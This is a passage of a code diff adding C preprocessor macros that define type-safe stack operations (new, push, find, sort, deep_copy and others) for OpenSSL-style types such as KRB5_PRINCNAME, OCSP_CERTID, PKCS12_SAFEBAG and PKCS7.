+# define sk_KRB5_PRINCNAME_zero(st) SKM_sk_zero(KRB5_PRINCNAME, (st))
+# define sk_KRB5_PRINCNAME_push(st, val) SKM_sk_push(KRB5_PRINCNAME, (st), (val))
+# define sk_KRB5_PRINCNAME_unshift(st, val) SKM_sk_unshift(KRB5_PRINCNAME, (st), (val))
+# define sk_KRB5_PRINCNAME_find(st, val) SKM_sk_find(KRB5_PRINCNAME, (st), (val))
+# define sk_KRB5_PRINCNAME_find_ex(st, val) SKM_sk_find_ex(KRB5_PRINCNAME, (st), (val))
+# define sk_KRB5_PRINCNAME_delete(st, i) SKM_sk_delete(KRB5_PRINCNAME, (st), (i))
+# define sk_KRB5_PRINCNAME_delete_ptr(st, ptr) SKM_sk_delete_ptr(KRB5_PRINCNAME, (st), (ptr))
+# define sk_KRB5_PRINCNAME_insert(st, val, i) SKM_sk_insert(KRB5_PRINCNAME, (st), (val), (i))
+# define sk_KRB5_PRINCNAME_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(KRB5_PRINCNAME, (st), (cmp))
+# define sk_KRB5_PRINCNAME_dup(st) SKM_sk_dup(KRB5_PRINCNAME, st)
+# define sk_KRB5_PRINCNAME_pop_free(st, free_func) SKM_sk_pop_free(KRB5_PRINCNAME, (st), (free_func))
+# define sk_KRB5_PRINCNAME_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(KRB5_PRINCNAME, (st), (copy_func), (free_func))
+# define sk_KRB5_PRINCNAME_shift(st) SKM_sk_shift(KRB5_PRINCNAME, (st))
+# define sk_KRB5_PRINCNAME_pop(st) SKM_sk_pop(KRB5_PRINCNAME, (st))
+# define sk_KRB5_PRINCNAME_sort(st) SKM_sk_sort(KRB5_PRINCNAME, (st))
+# define sk_KRB5_PRINCNAME_is_sorted(st) SKM_sk_is_sorted(KRB5_PRINCNAME, (st))
+# define sk_KRB5_TKTBODY_new(cmp) SKM_sk_new(KRB5_TKTBODY, (cmp))
+# define sk_KRB5_TKTBODY_new_null() SKM_sk_new_null(KRB5_TKTBODY)
+# define sk_KRB5_TKTBODY_free(st) SKM_sk_free(KRB5_TKTBODY, (st))
+# define sk_KRB5_TKTBODY_num(st) SKM_sk_num(KRB5_TKTBODY, (st))
+# define sk_KRB5_TKTBODY_value(st, i) SKM_sk_value(KRB5_TKTBODY, (st), (i))
+# define sk_KRB5_TKTBODY_set(st, i, val) SKM_sk_set(KRB5_TKTBODY, (st), (i), (val))
+# define sk_KRB5_TKTBODY_zero(st) SKM_sk_zero(KRB5_TKTBODY, (st))
+# define sk_KRB5_TKTBODY_push(st, val) SKM_sk_push(KRB5_TKTBODY, (st), (val))
+# define sk_KRB5_TKTBODY_unshift(st, val) SKM_sk_unshift(KRB5_TKTBODY, (st), (val))
+# define sk_KRB5_TKTBODY_find(st, val) SKM_sk_find(KRB5_TKTBODY, (st), (val))
+# define sk_KRB5_TKTBODY_find_ex(st, val) SKM_sk_find_ex(KRB5_TKTBODY, (st), (val))
+# define sk_KRB5_TKTBODY_delete(st, i) SKM_sk_delete(KRB5_TKTBODY, (st), (i))
+# define sk_KRB5_TKTBODY_delete_ptr(st, ptr) SKM_sk_delete_ptr(KRB5_TKTBODY, (st), (ptr))
+# define sk_KRB5_TKTBODY_insert(st, val, i) SKM_sk_insert(KRB5_TKTBODY, (st), (val), (i))
+# define sk_KRB5_TKTBODY_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(KRB5_TKTBODY, (st), (cmp))
+# define sk_KRB5_TKTBODY_dup(st) SKM_sk_dup(KRB5_TKTBODY, st)
+# define sk_KRB5_TKTBODY_pop_free(st, free_func) SKM_sk_pop_free(KRB5_TKTBODY, (st), (free_func))
+# define sk_KRB5_TKTBODY_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(KRB5_TKTBODY, (st), (copy_func), (free_func))
+# define sk_KRB5_TKTBODY_shift(st) SKM_sk_shift(KRB5_TKTBODY, (st))
+# define sk_KRB5_TKTBODY_pop(st) SKM_sk_pop(KRB5_TKTBODY, (st))
+# define sk_KRB5_TKTBODY_sort(st) SKM_sk_sort(KRB5_TKTBODY, (st))
+# define sk_KRB5_TKTBODY_is_sorted(st) SKM_sk_is_sorted(KRB5_TKTBODY, (st))
+# define sk_MEM_OBJECT_DATA_new(cmp) SKM_sk_new(MEM_OBJECT_DATA, (cmp))
+# define sk_MEM_OBJECT_DATA_new_null() SKM_sk_new_null(MEM_OBJECT_DATA)
+# define sk_MEM_OBJECT_DATA_free(st) SKM_sk_free(MEM_OBJECT_DATA, (st))
+# define sk_MEM_OBJECT_DATA_num(st) SKM_sk_num(MEM_OBJECT_DATA, (st))
+# define sk_MEM_OBJECT_DATA_value(st, i) SKM_sk_value(MEM_OBJECT_DATA, (st), (i))
+# define sk_MEM_OBJECT_DATA_set(st, i, val) SKM_sk_set(MEM_OBJECT_DATA, (st), (i), (val))
+# define sk_MEM_OBJECT_DATA_zero(st) SKM_sk_zero(MEM_OBJECT_DATA, (st))
+# define sk_MEM_OBJECT_DATA_push(st, val) SKM_sk_push(MEM_OBJECT_DATA, (st), (val))
+# define sk_MEM_OBJECT_DATA_unshift(st, val) SKM_sk_unshift(MEM_OBJECT_DATA, (st), (val))
+# define sk_MEM_OBJECT_DATA_find(st, val) SKM_sk_find(MEM_OBJECT_DATA, (st), (val))
+# define sk_MEM_OBJECT_DATA_find_ex(st, val) SKM_sk_find_ex(MEM_OBJECT_DATA, (st), (val))
+# define sk_MEM_OBJECT_DATA_delete(st, i) SKM_sk_delete(MEM_OBJECT_DATA, (st), (i))
+# define sk_MEM_OBJECT_DATA_delete_ptr(st, ptr) SKM_sk_delete_ptr(MEM_OBJECT_DATA, (st), (ptr))
+# define sk_MEM_OBJECT_DATA_insert(st, val, i) SKM_sk_insert(MEM_OBJECT_DATA, (st), (val), (i))
+# define sk_MEM_OBJECT_DATA_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(MEM_OBJECT_DATA, (st), (cmp))
+# define sk_MEM_OBJECT_DATA_dup(st) SKM_sk_dup(MEM_OBJECT_DATA, st)
+# define sk_MEM_OBJECT_DATA_pop_free(st, free_func) SKM_sk_pop_free(MEM_OBJECT_DATA, (st), (free_func))
+# define sk_MEM_OBJECT_DATA_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(MEM_OBJECT_DATA, (st), (copy_func), (free_func))
+# define sk_MEM_OBJECT_DATA_shift(st) SKM_sk_shift(MEM_OBJECT_DATA, (st))
+# define sk_MEM_OBJECT_DATA_pop(st) SKM_sk_pop(MEM_OBJECT_DATA, (st))
+# define sk_MEM_OBJECT_DATA_sort(st) SKM_sk_sort(MEM_OBJECT_DATA, (st))
+# define sk_MEM_OBJECT_DATA_is_sorted(st) SKM_sk_is_sorted(MEM_OBJECT_DATA, (st))
+# define sk_MIME_HEADER_new(cmp) SKM_sk_new(MIME_HEADER, (cmp))
+# define sk_MIME_HEADER_new_null() SKM_sk_new_null(MIME_HEADER)
+# define sk_MIME_HEADER_free(st) SKM_sk_free(MIME_HEADER, (st))
+# define sk_MIME_HEADER_num(st) SKM_sk_num(MIME_HEADER, (st))
+# define sk_MIME_HEADER_value(st, i) SKM_sk_value(MIME_HEADER, (st), (i))
+# define sk_MIME_HEADER_set(st, i, val) SKM_sk_set(MIME_HEADER, (st), (i), (val))
+# define sk_MIME_HEADER_zero(st) SKM_sk_zero(MIME_HEADER, (st))
+# define sk_MIME_HEADER_push(st, val) SKM_sk_push(MIME_HEADER, (st), (val))
+# define sk_MIME_HEADER_unshift(st, val) SKM_sk_unshift(MIME_HEADER, (st), (val))
+# define sk_MIME_HEADER_find(st, val) SKM_sk_find(MIME_HEADER, (st), (val))
+# define sk_MIME_HEADER_find_ex(st, val) SKM_sk_find_ex(MIME_HEADER, (st), (val))
+# define sk_MIME_HEADER_delete(st, i) SKM_sk_delete(MIME_HEADER, (st), (i))
+# define sk_MIME_HEADER_delete_ptr(st, ptr) SKM_sk_delete_ptr(MIME_HEADER, (st), (ptr))
+# define sk_MIME_HEADER_insert(st, val, i) SKM_sk_insert(MIME_HEADER, (st), (val), (i))
+# define sk_MIME_HEADER_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(MIME_HEADER, (st), (cmp))
+# define sk_MIME_HEADER_dup(st) SKM_sk_dup(MIME_HEADER, st)
+# define sk_MIME_HEADER_pop_free(st, free_func) SKM_sk_pop_free(MIME_HEADER, (st), (free_func))
+# define sk_MIME_HEADER_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(MIME_HEADER, (st), (copy_func), (free_func))
+# define sk_MIME_HEADER_shift(st) SKM_sk_shift(MIME_HEADER, (st))
+# define sk_MIME_HEADER_pop(st) SKM_sk_pop(MIME_HEADER, (st))
+# define sk_MIME_HEADER_sort(st) SKM_sk_sort(MIME_HEADER, (st))
+# define sk_MIME_HEADER_is_sorted(st) SKM_sk_is_sorted(MIME_HEADER, (st))
+# define sk_MIME_PARAM_new(cmp) SKM_sk_new(MIME_PARAM, (cmp))
+# define sk_MIME_PARAM_new_null() SKM_sk_new_null(MIME_PARAM)
+# define sk_MIME_PARAM_free(st) SKM_sk_free(MIME_PARAM, (st))
+# define sk_MIME_PARAM_num(st) SKM_sk_num(MIME_PARAM, (st))
+# define sk_MIME_PARAM_value(st, i) SKM_sk_value(MIME_PARAM, (st), (i))
+# define sk_MIME_PARAM_set(st, i, val) SKM_sk_set(MIME_PARAM, (st), (i), (val))
+# define sk_MIME_PARAM_zero(st) SKM_sk_zero(MIME_PARAM, (st))
+# define sk_MIME_PARAM_push(st, val) SKM_sk_push(MIME_PARAM, (st), (val))
+# define sk_MIME_PARAM_unshift(st, val) SKM_sk_unshift(MIME_PARAM, (st), (val))
+# define sk_MIME_PARAM_find(st, val) SKM_sk_find(MIME_PARAM, (st), (val))
+# define sk_MIME_PARAM_find_ex(st, val) SKM_sk_find_ex(MIME_PARAM, (st), (val))
+# define sk_MIME_PARAM_delete(st, i) SKM_sk_delete(MIME_PARAM, (st), (i))
+# define sk_MIME_PARAM_delete_ptr(st, ptr) SKM_sk_delete_ptr(MIME_PARAM, (st), (ptr))
+# define sk_MIME_PARAM_insert(st, val, i) SKM_sk_insert(MIME_PARAM, (st), (val), (i))
+# define sk_MIME_PARAM_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(MIME_PARAM, (st), (cmp))
+# define sk_MIME_PARAM_dup(st) SKM_sk_dup(MIME_PARAM, st)
+# define sk_MIME_PARAM_pop_free(st, free_func) SKM_sk_pop_free(MIME_PARAM, (st), (free_func))
+# define sk_MIME_PARAM_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(MIME_PARAM, (st), (copy_func), (free_func))
+# define sk_MIME_PARAM_shift(st) SKM_sk_shift(MIME_PARAM, (st))
+# define sk_MIME_PARAM_pop(st) SKM_sk_pop(MIME_PARAM, (st))
+# define sk_MIME_PARAM_sort(st) SKM_sk_sort(MIME_PARAM, (st))
+# define sk_MIME_PARAM_is_sorted(st) SKM_sk_is_sorted(MIME_PARAM, (st))
+# define sk_NAME_FUNCS_new(cmp) SKM_sk_new(NAME_FUNCS, (cmp))
+# define sk_NAME_FUNCS_new_null() SKM_sk_new_null(NAME_FUNCS)
+# define sk_NAME_FUNCS_free(st) SKM_sk_free(NAME_FUNCS, (st))
+# define sk_NAME_FUNCS_num(st) SKM_sk_num(NAME_FUNCS, (st))
+# define sk_NAME_FUNCS_value(st, i) SKM_sk_value(NAME_FUNCS, (st), (i))
+# define sk_NAME_FUNCS_set(st, i, val) SKM_sk_set(NAME_FUNCS, (st), (i), (val))
+# define sk_NAME_FUNCS_zero(st) SKM_sk_zero(NAME_FUNCS, (st))
+# define sk_NAME_FUNCS_push(st, val) SKM_sk_push(NAME_FUNCS, (st), (val))
+# define sk_NAME_FUNCS_unshift(st, val) SKM_sk_unshift(NAME_FUNCS, (st), (val))
+# define sk_NAME_FUNCS_find(st, val) SKM_sk_find(NAME_FUNCS, (st), (val))
+# define sk_NAME_FUNCS_find_ex(st, val) SKM_sk_find_ex(NAME_FUNCS, (st), (val))
+# define sk_NAME_FUNCS_delete(st, i) SKM_sk_delete(NAME_FUNCS, (st), (i))
+# define sk_NAME_FUNCS_delete_ptr(st, ptr) SKM_sk_delete_ptr(NAME_FUNCS, (st), (ptr))
+# define sk_NAME_FUNCS_insert(st, val, i) SKM_sk_insert(NAME_FUNCS, (st), (val), (i))
+# define sk_NAME_FUNCS_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(NAME_FUNCS, (st), (cmp))
+# define sk_NAME_FUNCS_dup(st) SKM_sk_dup(NAME_FUNCS, st)
+# define sk_NAME_FUNCS_pop_free(st, free_func) SKM_sk_pop_free(NAME_FUNCS, (st), (free_func))
+# define sk_NAME_FUNCS_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(NAME_FUNCS, (st), (copy_func), (free_func))
+# define sk_NAME_FUNCS_shift(st) SKM_sk_shift(NAME_FUNCS, (st))
+# define sk_NAME_FUNCS_pop(st) SKM_sk_pop(NAME_FUNCS, (st))
+# define sk_NAME_FUNCS_sort(st) SKM_sk_sort(NAME_FUNCS, (st))
+# define sk_NAME_FUNCS_is_sorted(st) SKM_sk_is_sorted(NAME_FUNCS, (st))
+# define sk_OCSP_CERTID_new(cmp) SKM_sk_new(OCSP_CERTID, (cmp))
+# define sk_OCSP_CERTID_new_null() SKM_sk_new_null(OCSP_CERTID)
+# define sk_OCSP_CERTID_free(st) SKM_sk_free(OCSP_CERTID, (st))
+# define sk_OCSP_CERTID_num(st) SKM_sk_num(OCSP_CERTID, (st))
+# define sk_OCSP_CERTID_value(st, i) SKM_sk_value(OCSP_CERTID, (st), (i))
+# define sk_OCSP_CERTID_set(st, i, val) SKM_sk_set(OCSP_CERTID, (st), (i), (val))
+# define sk_OCSP_CERTID_zero(st) SKM_sk_zero(OCSP_CERTID, (st))
+# define sk_OCSP_CERTID_push(st, val) SKM_sk_push(OCSP_CERTID, (st), (val))
+# define sk_OCSP_CERTID_unshift(st, val) SKM_sk_unshift(OCSP_CERTID, (st), (val))
+# define sk_OCSP_CERTID_find(st, val) SKM_sk_find(OCSP_CERTID, (st), (val))
+# define sk_OCSP_CERTID_find_ex(st, val) SKM_sk_find_ex(OCSP_CERTID, (st), (val))
+# define sk_OCSP_CERTID_delete(st, i) SKM_sk_delete(OCSP_CERTID, (st), (i))
+# define sk_OCSP_CERTID_delete_ptr(st, ptr) SKM_sk_delete_ptr(OCSP_CERTID, (st), (ptr))
+# define sk_OCSP_CERTID_insert(st, val, i) SKM_sk_insert(OCSP_CERTID, (st), (val), (i))
+# define sk_OCSP_CERTID_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(OCSP_CERTID, (st), (cmp))
+# define sk_OCSP_CERTID_dup(st) SKM_sk_dup(OCSP_CERTID, st)
+# define sk_OCSP_CERTID_pop_free(st, free_func) SKM_sk_pop_free(OCSP_CERTID, (st), (free_func))
+# define sk_OCSP_CERTID_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(OCSP_CERTID, (st), (copy_func), (free_func))
+# define sk_OCSP_CERTID_shift(st) SKM_sk_shift(OCSP_CERTID, (st))
+# define sk_OCSP_CERTID_pop(st) SKM_sk_pop(OCSP_CERTID, (st))
+# define sk_OCSP_CERTID_sort(st) SKM_sk_sort(OCSP_CERTID, (st))
+# define sk_OCSP_CERTID_is_sorted(st) SKM_sk_is_sorted(OCSP_CERTID, (st))
+# define sk_OCSP_ONEREQ_new(cmp) SKM_sk_new(OCSP_ONEREQ, (cmp))
+# define sk_OCSP_ONEREQ_new_null() SKM_sk_new_null(OCSP_ONEREQ)
+# define sk_OCSP_ONEREQ_free(st) SKM_sk_free(OCSP_ONEREQ, (st))
+# define sk_OCSP_ONEREQ_num(st) SKM_sk_num(OCSP_ONEREQ, (st))
+# define sk_OCSP_ONEREQ_value(st, i) SKM_sk_value(OCSP_ONEREQ, (st), (i))
+# define sk_OCSP_ONEREQ_set(st, i, val) SKM_sk_set(OCSP_ONEREQ, (st), (i), (val))
+# define sk_OCSP_ONEREQ_zero(st) SKM_sk_zero(OCSP_ONEREQ, (st))
+# define sk_OCSP_ONEREQ_push(st, val) SKM_sk_push(OCSP_ONEREQ, (st), (val))
+# define sk_OCSP_ONEREQ_unshift(st, val) SKM_sk_unshift(OCSP_ONEREQ, (st), (val))
+# define sk_OCSP_ONEREQ_find(st, val) SKM_sk_find(OCSP_ONEREQ, (st), (val))
+# define sk_OCSP_ONEREQ_find_ex(st, val) SKM_sk_find_ex(OCSP_ONEREQ, (st), (val))
+# define sk_OCSP_ONEREQ_delete(st, i) SKM_sk_delete(OCSP_ONEREQ, (st), (i))
+# define sk_OCSP_ONEREQ_delete_ptr(st, ptr) SKM_sk_delete_ptr(OCSP_ONEREQ, (st), (ptr))
+# define sk_OCSP_ONEREQ_insert(st, val, i) SKM_sk_insert(OCSP_ONEREQ, (st), (val), (i))
+# define sk_OCSP_ONEREQ_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(OCSP_ONEREQ, (st), (cmp))
+# define sk_OCSP_ONEREQ_dup(st) SKM_sk_dup(OCSP_ONEREQ, st)
+# define sk_OCSP_ONEREQ_pop_free(st, free_func) SKM_sk_pop_free(OCSP_ONEREQ, (st), (free_func))
+# define sk_OCSP_ONEREQ_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(OCSP_ONEREQ, (st), (copy_func), (free_func))
+# define sk_OCSP_ONEREQ_shift(st) SKM_sk_shift(OCSP_ONEREQ, (st))
+# define sk_OCSP_ONEREQ_pop(st) SKM_sk_pop(OCSP_ONEREQ, (st))
+# define sk_OCSP_ONEREQ_sort(st) SKM_sk_sort(OCSP_ONEREQ, (st))
+# define sk_OCSP_ONEREQ_is_sorted(st) SKM_sk_is_sorted(OCSP_ONEREQ, (st))
+# define sk_OCSP_RESPID_new(cmp) SKM_sk_new(OCSP_RESPID, (cmp))
+# define sk_OCSP_RESPID_new_null() SKM_sk_new_null(OCSP_RESPID)
+# define sk_OCSP_RESPID_free(st) SKM_sk_free(OCSP_RESPID, (st))
+# define sk_OCSP_RESPID_num(st) SKM_sk_num(OCSP_RESPID, (st))
+# define sk_OCSP_RESPID_value(st, i) SKM_sk_value(OCSP_RESPID, (st), (i))
+# define sk_OCSP_RESPID_set(st, i, val) SKM_sk_set(OCSP_RESPID, (st), (i), (val))
+# define sk_OCSP_RESPID_zero(st) SKM_sk_zero(OCSP_RESPID, (st))
+# define sk_OCSP_RESPID_push(st, val) SKM_sk_push(OCSP_RESPID, (st), (val))
+# define sk_OCSP_RESPID_unshift(st, val) SKM_sk_unshift(OCSP_RESPID, (st), (val))
+# define sk_OCSP_RESPID_find(st, val) SKM_sk_find(OCSP_RESPID, (st), (val))
+# define sk_OCSP_RESPID_find_ex(st, val) SKM_sk_find_ex(OCSP_RESPID, (st), (val))
+# define sk_OCSP_RESPID_delete(st, i) SKM_sk_delete(OCSP_RESPID, (st), (i))
+# define sk_OCSP_RESPID_delete_ptr(st, ptr) SKM_sk_delete_ptr(OCSP_RESPID, (st), (ptr))
+# define sk_OCSP_RESPID_insert(st, val, i) SKM_sk_insert(OCSP_RESPID, (st), (val), (i))
+# define sk_OCSP_RESPID_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(OCSP_RESPID, (st), (cmp))
+# define sk_OCSP_RESPID_dup(st) SKM_sk_dup(OCSP_RESPID, st)
+# define sk_OCSP_RESPID_pop_free(st, free_func) SKM_sk_pop_free(OCSP_RESPID, (st), (free_func))
+# define sk_OCSP_RESPID_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(OCSP_RESPID, (st), (copy_func), (free_func))
+# define sk_OCSP_RESPID_shift(st) SKM_sk_shift(OCSP_RESPID, (st))
+# define sk_OCSP_RESPID_pop(st) SKM_sk_pop(OCSP_RESPID, (st))
+# define sk_OCSP_RESPID_sort(st) SKM_sk_sort(OCSP_RESPID, (st))
+# define sk_OCSP_RESPID_is_sorted(st) SKM_sk_is_sorted(OCSP_RESPID, (st))
+# define sk_OCSP_SINGLERESP_new(cmp) SKM_sk_new(OCSP_SINGLERESP, (cmp))
+# define sk_OCSP_SINGLERESP_new_null() SKM_sk_new_null(OCSP_SINGLERESP)
+# define sk_OCSP_SINGLERESP_free(st) SKM_sk_free(OCSP_SINGLERESP, (st))
+# define sk_OCSP_SINGLERESP_num(st) SKM_sk_num(OCSP_SINGLERESP, (st))
+# define sk_OCSP_SINGLERESP_value(st, i) SKM_sk_value(OCSP_SINGLERESP, (st), (i))
+# define sk_OCSP_SINGLERESP_set(st, i, val) SKM_sk_set(OCSP_SINGLERESP, (st), (i), (val))
+# define sk_OCSP_SINGLERESP_zero(st) SKM_sk_zero(OCSP_SINGLERESP, (st))
+# define sk_OCSP_SINGLERESP_push(st, val) SKM_sk_push(OCSP_SINGLERESP, (st), (val))
+# define sk_OCSP_SINGLERESP_unshift(st, val) SKM_sk_unshift(OCSP_SINGLERESP, (st), (val))
+# define sk_OCSP_SINGLERESP_find(st, val) SKM_sk_find(OCSP_SINGLERESP, (st), (val))
+# define sk_OCSP_SINGLERESP_find_ex(st, val) SKM_sk_find_ex(OCSP_SINGLERESP, (st), (val))
+# define sk_OCSP_SINGLERESP_delete(st, i) SKM_sk_delete(OCSP_SINGLERESP, (st), (i))
+# define sk_OCSP_SINGLERESP_delete_ptr(st, ptr) SKM_sk_delete_ptr(OCSP_SINGLERESP, (st), (ptr))
+# define sk_OCSP_SINGLERESP_insert(st, val, i) SKM_sk_insert(OCSP_SINGLERESP, (st), (val), (i))
+# define sk_OCSP_SINGLERESP_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(OCSP_SINGLERESP, (st), (cmp))
+# define sk_OCSP_SINGLERESP_dup(st) SKM_sk_dup(OCSP_SINGLERESP, st)
+# define sk_OCSP_SINGLERESP_pop_free(st, free_func) SKM_sk_pop_free(OCSP_SINGLERESP, (st), (free_func))
+# define sk_OCSP_SINGLERESP_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(OCSP_SINGLERESP, (st), (copy_func), (free_func))
+# define sk_OCSP_SINGLERESP_shift(st) SKM_sk_shift(OCSP_SINGLERESP, (st))
+# define sk_OCSP_SINGLERESP_pop(st) SKM_sk_pop(OCSP_SINGLERESP, (st))
+# define sk_OCSP_SINGLERESP_sort(st) SKM_sk_sort(OCSP_SINGLERESP, (st))
+# define sk_OCSP_SINGLERESP_is_sorted(st) SKM_sk_is_sorted(OCSP_SINGLERESP, (st))
+# define sk_PKCS12_SAFEBAG_new(cmp) SKM_sk_new(PKCS12_SAFEBAG, (cmp))
+# define sk_PKCS12_SAFEBAG_new_null() SKM_sk_new_null(PKCS12_SAFEBAG)
+# define sk_PKCS12_SAFEBAG_free(st) SKM_sk_free(PKCS12_SAFEBAG, (st))
+# define sk_PKCS12_SAFEBAG_num(st) SKM_sk_num(PKCS12_SAFEBAG, (st))
+# define sk_PKCS12_SAFEBAG_value(st, i) SKM_sk_value(PKCS12_SAFEBAG, (st), (i))
+# define sk_PKCS12_SAFEBAG_set(st, i, val) SKM_sk_set(PKCS12_SAFEBAG, (st), (i), (val))
+# define sk_PKCS12_SAFEBAG_zero(st) SKM_sk_zero(PKCS12_SAFEBAG, (st))
+# define sk_PKCS12_SAFEBAG_push(st, val) SKM_sk_push(PKCS12_SAFEBAG, (st), (val))
+# define sk_PKCS12_SAFEBAG_unshift(st, val) SKM_sk_unshift(PKCS12_SAFEBAG, (st), (val))
+# define sk_PKCS12_SAFEBAG_find(st, val) SKM_sk_find(PKCS12_SAFEBAG, (st), (val))
+# define sk_PKCS12_SAFEBAG_find_ex(st, val) SKM_sk_find_ex(PKCS12_SAFEBAG, (st), (val))
+# define sk_PKCS12_SAFEBAG_delete(st, i) SKM_sk_delete(PKCS12_SAFEBAG, (st), (i))
+# define sk_PKCS12_SAFEBAG_delete_ptr(st, ptr) SKM_sk_delete_ptr(PKCS12_SAFEBAG, (st), (ptr))
+# define sk_PKCS12_SAFEBAG_insert(st, val, i) SKM_sk_insert(PKCS12_SAFEBAG, (st), (val), (i))
+# define sk_PKCS12_SAFEBAG_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(PKCS12_SAFEBAG, (st), (cmp))
+# define sk_PKCS12_SAFEBAG_dup(st) SKM_sk_dup(PKCS12_SAFEBAG, st)
+# define sk_PKCS12_SAFEBAG_pop_free(st, free_func) SKM_sk_pop_free(PKCS12_SAFEBAG, (st), (free_func))
+# define sk_PKCS12_SAFEBAG_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(PKCS12_SAFEBAG, (st), (copy_func), (free_func))
+# define sk_PKCS12_SAFEBAG_shift(st) SKM_sk_shift(PKCS12_SAFEBAG, (st))
+# define sk_PKCS12_SAFEBAG_pop(st) SKM_sk_pop(PKCS12_SAFEBAG, (st))
+# define sk_PKCS12_SAFEBAG_sort(st) SKM_sk_sort(PKCS12_SAFEBAG, (st))
+# define sk_PKCS12_SAFEBAG_is_sorted(st) SKM_sk_is_sorted(PKCS12_SAFEBAG, (st))
+# define sk_PKCS7_new(cmp) SKM_sk_new(PKCS7, (cmp))
+# define sk_PKCS7_new_null() SKM_sk_new_null(PKCS7)
+# define sk_PKCS7_free(st) SKM_sk_free(PKCS7, (st))
+# define sk_PKCS7_num(st) SKM_sk_num(PKCS7, (st))
+# define sk_PKCS7_value(st, i) SKM_sk_value(PKCS7, (st), (i))
+# define sk_PKCS7_set(st, i, val) SKM_sk_set(PKCS7, (st), (i), (val))
+# define sk_PKCS7_zero(st) SKM_sk_zero(PKCS7, (st))
+# define sk_PKCS7_push(st, val) SKM_sk_push(PKCS7, (st), (val))
+# define sk_PKCS7_unshift(st, val) SKM_sk_unshift(PKCS7, (st), (val))
+# define sk_PKCS7_find(st, val) SKM_sk_find(PKCS7, (st), (val))
+# define sk_PKCS7_find_ex(st, val) SKM_sk_find_ex(PKCS7, (st), (val))
+# define sk_PKCS7_delete(st, i) SKM_sk_delete(PKCS7, (st), (i))
+# define sk_PKCS7_delete_ptr(st, ptr) SKM_sk_delete_ptr(PKCS7, (st), (ptr))
+# define sk_PKCS7_insert(st, val, i) SKM_sk_insert(PKCS7, (st), (val), (i))
+# define sk_PKCS7_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(PKCS7, (st), (cmp))
+# define sk_PKCS7_dup(st) SKM_sk_dup(PKCS7, st)
+# define sk_PKCS7_pop_free(st, free_func) SKM_sk_pop_free(PKCS7, (st), (free_func))
+# define sk_PKCS7_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(PKCS7, (st), (copy_func), (free_func))
+# define sk_PKCS7_shift(st) SKM_sk_shift(PKCS7, (st))
+# define sk_PKCS7_pop(st) SKM_sk_pop(PKCS7, (st))
+# define sk_PKCS7_sort(st) SKM_sk_sort(PKCS7, (st))
+# define sk_PKCS7_is_sorted(st) SKM_sk_is_sorted(PKCS7, (st))
+# define sk_PKCS7_RECIP_INFO_new(cmp) SKM_sk_new(PKCS7_RECIP_INFO, (cmp))
+# define sk_PKCS7_RECIP_INFO_new_null() SKM_sk_new_null(PKCS7_RECIP_INFO)
+# define sk_PKCS7_RECIP_INFO_free(st) SKM_sk_free(PKCS7_RECIP_INFO, (st))
+# define sk_PKCS7_RECIP_INFO_num(st) SKM_sk_num(PKCS7_RECIP_INFO, (st))
+# define sk_PKCS7_RECIP_INFO_value(st, i) SKM_sk_value(PKCS7_RECIP_INFO, (st), (i))
+# define sk_PKCS7_RECIP_INFO_set(st, i, val) SKM_sk_set(PKCS7_RECIP_INFO, (st), (i), (val))
+# define sk_PKCS7_RECIP_INFO_zero(st) SKM_sk_zero(PKCS7_RECIP_INFO, (st))
+# define sk_PKCS7_RECIP_INFO_push(st, val) SKM_sk_push(PKCS7_RECIP_INFO, (st), (val))
+# define sk_PKCS7_RECIP_INFO_unshift(st, val) SKM_sk_unshift(PKCS7_RECIP_INFO, (st), (val))
+# define sk_PKCS7_RECIP_INFO_find(st, val) SKM_sk_find(PKCS7_RECIP_INFO, (st), (val))
+# define sk_PKCS7_RECIP_INFO_find_ex(st, val) SKM_sk_find_ex(PKCS7_RECIP_INFO, (st), (val))
+# define sk_PKCS7_RECIP_INFO_delete(st, i) SKM_sk_delete(PKCS7_RECIP_INFO, (st), (i))
+# define sk_PKCS7_RECIP_INFO_delete_ptr(st, ptr) SKM_sk_delete_ptr(PKCS7_RECIP_INFO, (st), (ptr))
+# define sk_PKCS7_RECIP_INFO_insert(st, val, i) SKM_sk_insert(PKCS7_RECIP_INFO, (st), (val), (i))
+# define sk_PKCS7_RECIP_INFO_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(PKCS7_RECIP_INFO, (st), (cmp))
+# define sk_PKCS7_RECIP_INFO_dup(st) SKM_sk_dup(PKCS7_RECIP_INFO, st)
+# define sk_PKCS7_RECIP_INFO_pop_free(st, free_func) SKM_sk_pop_free(PKCS7_RECIP_INFO, (st), (free_func))
+# define sk_PKCS7_RECIP_INFO_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(PKCS7_RECIP_INFO, (st), (copy_func), (free_func))
+# define sk_PKCS7_RECIP_INFO_shift(st) SKM_sk_shift(PKCS7_RECIP_INFO, (st))
+# define sk_PKCS7_RECIP_INFO_pop(st) SKM_sk_pop(PKCS7_RECIP_INFO, (st))
+# define sk_PKCS7_RECIP_INFO_sort(st) SKM_sk_sort(PKCS7_RECIP_INFO, (st))
+# define sk_PKCS7_RECIP_INFO_is_sorted(st) SKM_sk_is_sorted(PKCS7_RECIP_INFO, (st))
+# define sk_PKCS7_SIGNER_INFO_new(cmp) SKM_sk_new(PKCS7_SIGNER_INFO, (cmp))
